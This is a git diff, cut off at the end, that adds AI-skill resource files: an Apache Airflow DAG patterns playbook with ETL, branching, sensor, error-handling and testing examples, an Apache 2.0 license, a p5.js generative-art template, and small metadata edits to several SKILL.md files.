+++ b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
@@ -0,0 +1,509 @@
+# Apache Airflow DAG Patterns Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Core Concepts
+
+### 1. DAG Design Principles
+
+| Principle | Description |
+|-----------|-------------|
+| **Idempotent** | Running twice produces same result |
+| **Atomic** | Tasks succeed or fail completely |
+| **Incremental** | Process only new/changed data |
+| **Observable** | Logs, metrics, alerts at every step |
+
+### 2. Task Dependencies
+
+```python
+# Linear
+task1 >> task2 >> task3
+
+# Fan-out
+task1 >> [task2, task3, task4]
+
+# Fan-in
+[task1, task2, task3] >> task4
+
+# Complex
+task1 >> task2 >> task4
+task1 >> task3 >> task4
+```
+
+## Quick Start
+
+```python
+# dags/example_dag.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.operators.empty import EmptyOperator
+
+default_args = {
+ 'owner': 'data-team',
+ 'depends_on_past': False,
+ 'email_on_failure': True,
+ 'email_on_retry': False,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ 'retry_exponential_backoff': True,
+ 'max_retry_delay': timedelta(hours=1),
+}
+
+with DAG(
+ dag_id='example_etl',
+ default_args=default_args,
+ description='Example ETL pipeline',
+ schedule='0 6 * * *', # Daily at 6 AM
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'example'],
+ max_active_runs=1,
+) as dag:
+
+ start = EmptyOperator(task_id='start')
+
+ def extract_data(**context):
+ execution_date = context['ds']
+ # Extract logic here
+ return {'records': 1000}
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_data,
+ )
+
+ end = EmptyOperator(task_id='end')
+
+ start >> extract >> end
+```
+
+## Patterns
+
+### Pattern 1: TaskFlow API (Airflow 2.0+)
+
+```python
+# dags/taskflow_example.py
+from datetime import datetime
+from airflow.decorators import dag, task
+from airflow.models import Variable
+
+@dag(
+ dag_id='taskflow_etl',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'taskflow'],
+)
+def taskflow_etl():
+ """ETL pipeline using TaskFlow API"""
+
+ @task()
+ def extract(source: str) -> dict:
+ """Extract data from source"""
+ import pandas as pd
+
+ df = pd.read_csv(f's3://bucket/{source}/{{ ds }}.csv')
+ return {'data': df.to_dict(), 'rows': len(df)}
+
+ @task()
+ def transform(extracted: dict) -> dict:
+ """Transform extracted data"""
+ import pandas as pd
+
+ df = pd.DataFrame(extracted['data'])
+ df['processed_at'] = datetime.now()
+ df = df.dropna()
+ return {'data': df.to_dict(), 'rows': len(df)}
+
+ @task()
+ def load(transformed: dict, target: str):
+ """Load data to target"""
+ import pandas as pd
+
+ df = pd.DataFrame(transformed['data'])
+ df.to_parquet(f's3://bucket/{target}/{{ ds }}.parquet')
+ return transformed['rows']
+
+ @task()
+ def notify(rows_loaded: int):
+ """Send notification"""
+ print(f'Loaded {rows_loaded} rows')
+
+ # Define dependencies with XCom passing
+ extracted = extract(source='raw_data')
+ transformed = transform(extracted)
+ loaded = load(transformed, target='processed_data')
+ notify(loaded)
+
+# Instantiate the DAG
+taskflow_etl()
+```
+
+### Pattern 2: Dynamic DAG Generation
+
+```python
+# dags/dynamic_dag_factory.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.models import Variable
+import json
+
+# Configuration for multiple similar pipelines
+PIPELINE_CONFIGS = [
+ {'name': 'customers', 'schedule': '@daily', 'source': 's3://raw/customers'},
+ {'name': 'orders', 'schedule': '@hourly', 'source': 's3://raw/orders'},
+ {'name': 'products', 'schedule': '@weekly', 'source': 's3://raw/products'},
+]
+
+def create_dag(config: dict) -> DAG:
+ """Factory function to create DAGs from config"""
+
+ dag_id = f"etl_{config['name']}"
+
+ default_args = {
+ 'owner': 'data-team',
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ }
+
+ dag = DAG(
+ dag_id=dag_id,
+ default_args=default_args,
+ schedule=config['schedule'],
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'dynamic', config['name']],
+ )
+
+ with dag:
+ def extract_fn(source, **context):
+ print(f"Extracting from {source} for {context['ds']}")
+
+ def transform_fn(**context):
+ print(f"Transforming data for {context['ds']}")
+
+ def load_fn(table_name, **context):
+ print(f"Loading to {table_name} for {context['ds']}")
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_fn,
+ op_kwargs={'source': config['source']},
+ )
+
+ transform = PythonOperator(
+ task_id='transform',
+ python_callable=transform_fn,
+ )
+
+ load = PythonOperator(
+ task_id='load',
+ python_callable=load_fn,
+ op_kwargs={'table_name': config['name']},
+ )
+
+ extract >> transform >> load
+
+ return dag
+
+# Generate DAGs
+for config in PIPELINE_CONFIGS:
+ globals()[f"dag_{config['name']}"] = create_dag(config)
+```
+
+### Pattern 3: Branching and Conditional Logic
+
+```python
+# dags/branching_example.py
+from airflow.decorators import dag, task
+from airflow.operators.python import BranchPythonOperator
+from airflow.operators.empty import EmptyOperator
+from airflow.utils.trigger_rule import TriggerRule
+
+@dag(
+ dag_id='branching_pipeline',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+)
+def branching_pipeline():
+
+ @task()
+ def check_data_quality() -> dict:
+ """Check data quality and return metrics"""
+ quality_score = 0.95 # Simulated
+ return {'score': quality_score, 'rows': 10000}
+
+ def choose_branch(**context) -> str:
+ """Determine which branch to execute"""
+ ti = context['ti']
+ metrics = ti.xcom_pull(task_ids='check_data_quality')
+
+ if metrics['score'] >= 0.9:
+ return 'high_quality_path'
+ elif metrics['score'] >= 0.7:
+ return 'medium_quality_path'
+ else:
+ return 'low_quality_path'
+
+ quality_check = check_data_quality()
+
+ branch = BranchPythonOperator(
+ task_id='branch',
+ python_callable=choose_branch,
+ )
+
+ high_quality = EmptyOperator(task_id='high_quality_path')
+ medium_quality = EmptyOperator(task_id='medium_quality_path')
+ low_quality = EmptyOperator(task_id='low_quality_path')
+
+ # Join point - runs after any branch completes
+ join = EmptyOperator(
+ task_id='join',
+ trigger_rule=TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS,
+ )
+
+ quality_check >> branch >> [high_quality, medium_quality, low_quality] >> join
+
+branching_pipeline()
+```
+
+### Pattern 4: Sensors and External Dependencies
+
+```python
+# dags/sensor_patterns.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.sensors.filesystem import FileSensor
+from airflow.providers.amazon.aws.sensors.s3 import S3KeySensor
+from airflow.sensors.external_task import ExternalTaskSensor
+from airflow.operators.python import PythonOperator
+
+with DAG(
+ dag_id='sensor_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+) as dag:
+
+ # Wait for file on S3
+ wait_for_file = S3KeySensor(
+ task_id='wait_for_s3_file',
+ bucket_name='data-lake',
+ bucket_key='raw/{{ ds }}/data.parquet',
+ aws_conn_id='aws_default',
+ timeout=60 * 60 * 2, # 2 hours
+ poke_interval=60 * 5, # Check every 5 minutes
+ mode='reschedule', # Free up worker slot while waiting
+ )
+
+ # Wait for another DAG to complete
+ wait_for_upstream = ExternalTaskSensor(
+ task_id='wait_for_upstream_dag',
+ external_dag_id='upstream_etl',
+ external_task_id='final_task',
+ execution_date_fn=lambda dt: dt, # Same execution date
+ timeout=60 * 60 * 3,
+ mode='reschedule',
+ )
+
+ # Custom sensor using @task.sensor decorator
+ @task.sensor(poke_interval=60, timeout=3600, mode='reschedule')
+ def wait_for_api() -> PokeReturnValue:
+ """Custom sensor for API availability"""
+ import requests
+
+ response = requests.get('https://api.example.com/health')
+ is_done = response.status_code == 200
+
+ return PokeReturnValue(is_done=is_done, xcom_value=response.json())
+
+ api_ready = wait_for_api()
+
+ def process_data(**context):
+ api_result = context['ti'].xcom_pull(task_ids='wait_for_api')
+ print(f"API returned: {api_result}")
+
+ process = PythonOperator(
+ task_id='process',
+ python_callable=process_data,
+ )
+
+ [wait_for_file, wait_for_upstream, api_ready] >> process
+```
+
+### Pattern 5: Error Handling and Alerts
+
+```python
+# dags/error_handling.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.utils.trigger_rule import TriggerRule
+from airflow.models import Variable
+
+def task_failure_callback(context):
+ """Callback on task failure"""
+ task_instance = context['task_instance']
+ exception = context.get('exception')
+
+ # Send to Slack/PagerDuty/etc
+ message = f"""
+ Task Failed!
+ DAG: {task_instance.dag_id}
+ Task: {task_instance.task_id}
+ Execution Date: {context['ds']}
+ Error: {exception}
+ Log URL: {task_instance.log_url}
+ """
+ # send_slack_alert(message)
+ print(message)
+
+def dag_failure_callback(context):
+ """Callback on DAG failure"""
+ # Aggregate failures, send summary
+ pass
+
+with DAG(
+ dag_id='error_handling_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ on_failure_callback=dag_failure_callback,
+ default_args={
+ 'on_failure_callback': task_failure_callback,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ },
+) as dag:
+
+ def might_fail(**context):
+ import random
+ if random.random() < 0.3:
+ raise ValueError("Random failure!")
+ return "Success"
+
+ risky_task = PythonOperator(
+ task_id='risky_task',
+ python_callable=might_fail,
+ )
+
+ def cleanup(**context):
+ """Cleanup runs regardless of upstream failures"""
+ print("Cleaning up...")
+
+ cleanup_task = PythonOperator(
+ task_id='cleanup',
+ python_callable=cleanup,
+ trigger_rule=TriggerRule.ALL_DONE, # Run even if upstream fails
+ )
+
+ def notify_success(**context):
+ """Only runs if all upstream succeeded"""
+ print("All tasks succeeded!")
+
+ success_notification = PythonOperator(
+ task_id='notify_success',
+ python_callable=notify_success,
+ trigger_rule=TriggerRule.ALL_SUCCESS,
+ )
+
+ risky_task >> [cleanup_task, success_notification]
+```
+
+### Pattern 6: Testing DAGs
+
+```python
+# tests/test_dags.py
+import pytest
+from datetime import datetime
+from airflow.models import DagBag
+
+@pytest.fixture
+def dagbag():
+ return DagBag(dag_folder='dags/', include_examples=False)
+
+def test_dag_loaded(dagbag):
+ """Test that all DAGs load without errors"""
+ assert len(dagbag.import_errors) == 0, f"DAG import errors: {dagbag.import_errors}"
+
+def test_dag_structure(dagbag):
+ """Test specific DAG structure"""
+ dag = dagbag.get_dag('example_etl')
+
+ assert dag is not None
+ assert len(dag.tasks) == 3
+ assert dag.schedule_interval == '0 6 * * *'
+
+def test_task_dependencies(dagbag):
+ """Test task dependencies are correct"""
+ dag = dagbag.get_dag('example_etl')
+
+ extract_task = dag.get_task('extract')
+ assert 'start' in [t.task_id for t in extract_task.upstream_list]
+ assert 'end' in [t.task_id for t in extract_task.downstream_list]
+
+def test_dag_integrity(dagbag):
+ """Test DAG has no cycles and is valid"""
+ for dag_id, dag in dagbag.dags.items():
+ assert dag.test_cycle() is None, f"Cycle detected in {dag_id}"
+
+# Test individual task logic
+def test_extract_function():
+ """Unit test for extract function"""
+ from dags.example_dag import extract_data
+
+ result = extract_data(ds='2024-01-01')
+ assert 'records' in result
+ assert isinstance(result['records'], int)
+```
+
+## Project Structure
+
+```
+airflow/
+├── dags/
+│ ├── __init__.py
+│ ├── common/
+│ │ ├── __init__.py
+│ │ ├── operators.py # Custom operators
+│ │ ├── sensors.py # Custom sensors
+│ │ └── callbacks.py # Alert callbacks
+│ ├── etl/
+│ │ ├── customers.py
+│ │ └── orders.py
+│ └── ml/
+│ └── training.py
+├── plugins/
+│ └── custom_plugin.py
+├── tests/
+│ ├── __init__.py
+│ ├── test_dags.py
+│ └── test_operators.py
+├── docker-compose.yml
+└── requirements.txt
+```
+
+## Best Practices
+
+### Do's
+- **Use TaskFlow API** - Cleaner code, automatic XCom
+- **Set timeouts** - Prevent zombie tasks
+- **Use `mode='reschedule'`** - For sensors, free up workers
+- **Test DAGs** - Unit tests and integration tests
+- **Idempotent tasks** - Safe to retry
+
+### Don'ts
+- **Don't use `depends_on_past=True`** - Creates bottlenecks
+- **Don't hardcode dates** - Use `{{ ds }}` macros
+- **Don't use global state** - Tasks should be stateless
+- **Don't skip catchup blindly** - Understand implications
+- **Don't put heavy logic in DAG file** - Import from modules
+
+## Resources
+
+- [Airflow Documentation](https://airflow.apache.org/docs/)
+- [Astronomer Guides](https://docs.astronomer.io/learn)
+- [TaskFlow API](https://airflow.apache.org/docs/apache-airflow/stable/tutorial/taskflow.html)
diff --git a/web-app/public/skills/airtable-automation/SKILL.md b/web-app/public/skills/airtable-automation/SKILL.md
index 01b635c4..91b46786 100644
--- a/web-app/public/skills/airtable-automation/SKILL.md
+++ b/web-app/public/skills/airtable-automation/SKILL.md
@@ -1,10 +1,9 @@
---
name: airtable-automation
description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
-requires:
- mcp: [rube]
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Airtable Automation via Rube MCP
diff --git a/web-app/public/skills/algolia-search/SKILL.md b/web-app/public/skills/algolia-search/SKILL.md
index 82504bd4..73647c0d 100644
--- a/web-app/public/skills/algolia-search/SKILL.md
+++ b/web-app/public/skills/algolia-search/SKILL.md
@@ -1,8 +1,9 @@
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# Algolia Search Integration
diff --git a/web-app/public/skills/algorithmic-art/LICENSE.txt b/web-app/public/skills/algorithmic-art/LICENSE.txt
new file mode 100644
index 00000000..7a4a3ea2
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/LICENSE.txt
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/SKILL.md b/web-app/public/skills/algorithmic-art/SKILL.md
index e8557c27..0769241e 100644
--- a/web-app/public/skills/algorithmic-art/SKILL.md
+++ b/web-app/public/skills/algorithmic-art/SKILL.md
@@ -1,9 +1,9 @@
---
name: algorithmic-art
description: "Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields,..."
-license: Complete terms in LICENSE.txt
risk: unknown
source: community
+date_added: "2026-02-27"
---
Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
diff --git a/web-app/public/skills/algorithmic-art/templates/generator_template.js b/web-app/public/skills/algorithmic-art/templates/generator_template.js
new file mode 100644
index 00000000..e263fbde
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/generator_template.js
@@ -0,0 +1,223 @@
+/**
+ * ═══════════════════════════════════════════════════════════════════════════
+ * P5.JS GENERATIVE ART - BEST PRACTICES
+ * ═══════════════════════════════════════════════════════════════════════════
+ *
+ * This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
+ * It does NOT prescribe what art you should create.
+ *
+ * Your algorithmic philosophy should guide what you build.
+ * These are just best practices for how to structure your code.
+ *
+ * ═══════════════════════════════════════════════════════════════════════════
+ */
+
+// ============================================================================
+// 1. PARAMETER ORGANIZATION
+// ============================================================================
+// Keep all tunable parameters in one object
+// This makes it easy to:
+// - Connect to UI controls
+// - Reset to defaults
+// - Serialize/save configurations
+
+let params = {
+ // Define parameters that match YOUR algorithm
+ // Examples (customize for your art):
+ // - Counts: how many elements (particles, circles, branches, etc.)
+ // - Scales: size, speed, spacing
+ // - Probabilities: likelihood of events
+ // - Angles: rotation, direction
+ // - Colors: palette arrays
+
+ seed: 12345,
+ // define colorPalette as an array -- choose whatever colors you'd like ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5']
+ // Add YOUR parameters here based on your algorithm
+};
+
+// ============================================================================
+// 2. SEEDED RANDOMNESS (Critical for reproducibility)
+// ============================================================================
+// ALWAYS use seeded random for Art Blocks-style reproducible output
+
+function initializeSeed(seed) {
+ randomSeed(seed);
+ noiseSeed(seed);
+ // Now all random() and noise() calls will be deterministic
+}
+
+// ============================================================================
+// 3. P5.JS LIFECYCLE
+// ============================================================================
+
+function setup() {
+ createCanvas(800, 800);
+
+ // Initialize seed first
+ initializeSeed(params.seed);
+
+ // Set up your generative system
+ // This is where you initialize:
+ // - Arrays of objects
+ // - Grid structures
+ // - Initial positions
+ // - Starting states
+
+ // For static art: call noLoop() at the end of setup
+ // For animated art: let draw() keep running
+}
+
+function draw() {
+ // Option 1: Static generation (runs once, then stops)
+ // - Generate everything in setup()
+ // - Call noLoop() in setup()
+ // - draw() doesn't do much or can be empty
+
+ // Option 2: Animated generation (continuous)
+ // - Update your system each frame
+ // - Common patterns: particle movement, growth, evolution
+ // - Can optionally call noLoop() after N frames
+
+ // Option 3: User-triggered regeneration
+ // - Use noLoop() by default
+ // - Call redraw() when parameters change
+}
+
+// ============================================================================
+// 4. CLASS STRUCTURE (When you need objects)
+// ============================================================================
+// Use classes when your algorithm involves multiple entities
+// Examples: particles, agents, cells, nodes, etc.
+
+class Entity {
+ constructor() {
+ // Initialize entity properties
+ // Use random() here - it will be seeded
+ }
+
+ update() {
+ // Update entity state
+ // This might involve:
+ // - Physics calculations
+ // - Behavioral rules
+ // - Interactions with neighbors
+ }
+
+ display() {
+ // Render the entity
+ // Keep rendering logic separate from update logic
+ }
+}
+
+// ============================================================================
+// 5. PERFORMANCE CONSIDERATIONS
+// ============================================================================
+
+// For large numbers of elements:
+// - Pre-calculate what you can
+// - Use simple collision detection (spatial hashing if needed)
+// - Limit expensive operations (sqrt, trig) when possible
+// - Consider using p5 vectors efficiently
+
+// For smooth animation:
+// - Aim for 60fps
+// - Profile if things are slow
+// - Consider reducing particle counts or simplifying calculations
+
+// ============================================================================
+// 6. UTILITY FUNCTIONS
+// ============================================================================
+
+// Color utilities
+function hexToRgb(hex) {
+ const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
+ return result ? {
+ r: parseInt(result[1], 16),
+ g: parseInt(result[2], 16),
+ b: parseInt(result[3], 16)
+ } : null;
+}
+
+function colorFromPalette(index) {
+ return params.colorPalette[index % params.colorPalette.length];
+}
+
+// Mapping and easing
+function mapRange(value, inMin, inMax, outMin, outMax) {
+ return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
+}
+
+function easeInOutCubic(t) {
+ return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
+}
+
+// Constrain to bounds
+function wrapAround(value, max) {
+ if (value < 0) return max;
+ if (value > max) return 0;
+ return value;
+}
+
+// ============================================================================
+// 7. PARAMETER UPDATES (Connect to UI)
+// ============================================================================
+
+function updateParameter(paramName, value) {
+ params[paramName] = value;
+ // Decide if you need to regenerate or just update
+ // Some params can update in real-time, others need full regeneration
+}
+
+function regenerate() {
+ // Reinitialize your generative system
+ // Useful when parameters change significantly
+ initializeSeed(params.seed);
+ // Then regenerate your system
+}
+
+// ============================================================================
+// 8. COMMON P5.JS PATTERNS
+// ============================================================================
+
+// Drawing with transparency for trails/fading
+function fadeBackground(opacity) {
+ fill(250, 249, 245, opacity); // Anthropic light with alpha
+ noStroke();
+ rect(0, 0, width, height);
+}
+
+// Using noise for organic variation
+function getNoiseValue(x, y, scale = 0.01) {
+ return noise(x * scale, y * scale);
+}
+
+// Creating vectors from angles
+function vectorFromAngle(angle, magnitude = 1) {
+ return createVector(cos(angle), sin(angle)).mult(magnitude);
+}
+
+// ============================================================================
+// 9. EXPORT FUNCTIONS
+// ============================================================================
+
+function exportImage() {
+ saveCanvas('generative-art-' + params.seed, 'png');
+}
+
+// ============================================================================
+// REMEMBER
+// ============================================================================
+//
+// These are TOOLS and PRINCIPLES, not a recipe.
+// Your algorithmic philosophy should guide WHAT you create.
+// This structure helps you create it WELL.
+//
+// Focus on:
+// - Clean, readable code
+// - Parameterized for exploration
+// - Seeded for reproducibility
+// - Performant execution
+//
+// The art itself is entirely up to you!
+//
+// ============================================================================
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/templates/viewer.html b/web-app/public/skills/algorithmic-art/templates/viewer.html
new file mode 100644
index 00000000..630cc1f6
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/viewer.html
@@ -0,0 +1,599 @@
+
+
+
+
+
+
+ Generative Art Viewer
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Initializing generative art...
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/web-app/public/skills/amplitude-automation/SKILL.md b/web-app/public/skills/amplitude-automation/SKILL.md
index 710dc04d..d9c1f150 100644
--- a/web-app/public/skills/amplitude-automation/SKILL.md
+++ b/web-app/public/skills/amplitude-automation/SKILL.md
@@ -1,10 +1,9 @@
---
name: amplitude-automation
description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
-requires:
- mcp: [rube]
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Amplitude Automation via Rube MCP
diff --git a/web-app/public/skills/analytics-tracking/SKILL.md b/web-app/public/skills/analytics-tracking/SKILL.md
index 72bcbed0..86087f5d 100644
--- a/web-app/public/skills/analytics-tracking/SKILL.md
+++ b/web-app/public/skills/analytics-tracking/SKILL.md
@@ -1,13 +1,9 @@
---
name: analytics-tracking
-description: >
- Design, audit, and improve analytics tracking systems that produce reliable,
- decision-ready data. Use when the user wants to set up, fix, or evaluate
- analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs).
- This skill focuses on measurement strategy, signal quality, and validation—
- not just firing events.
+description: Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.
risk: unknown
source: community
+date_added: '2026-02-27'
---
# Analytics Tracking & Measurement Strategy
diff --git a/web-app/public/skills/android-jetpack-compose-expert/SKILL.md b/web-app/public/skills/android-jetpack-compose-expert/SKILL.md
index 93daf87d..55817790 100644
--- a/web-app/public/skills/android-jetpack-compose-expert/SKILL.md
+++ b/web-app/public/skills/android-jetpack-compose-expert/SKILL.md
@@ -1,8 +1,9 @@
---
name: android-jetpack-compose-expert
-description: Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3.
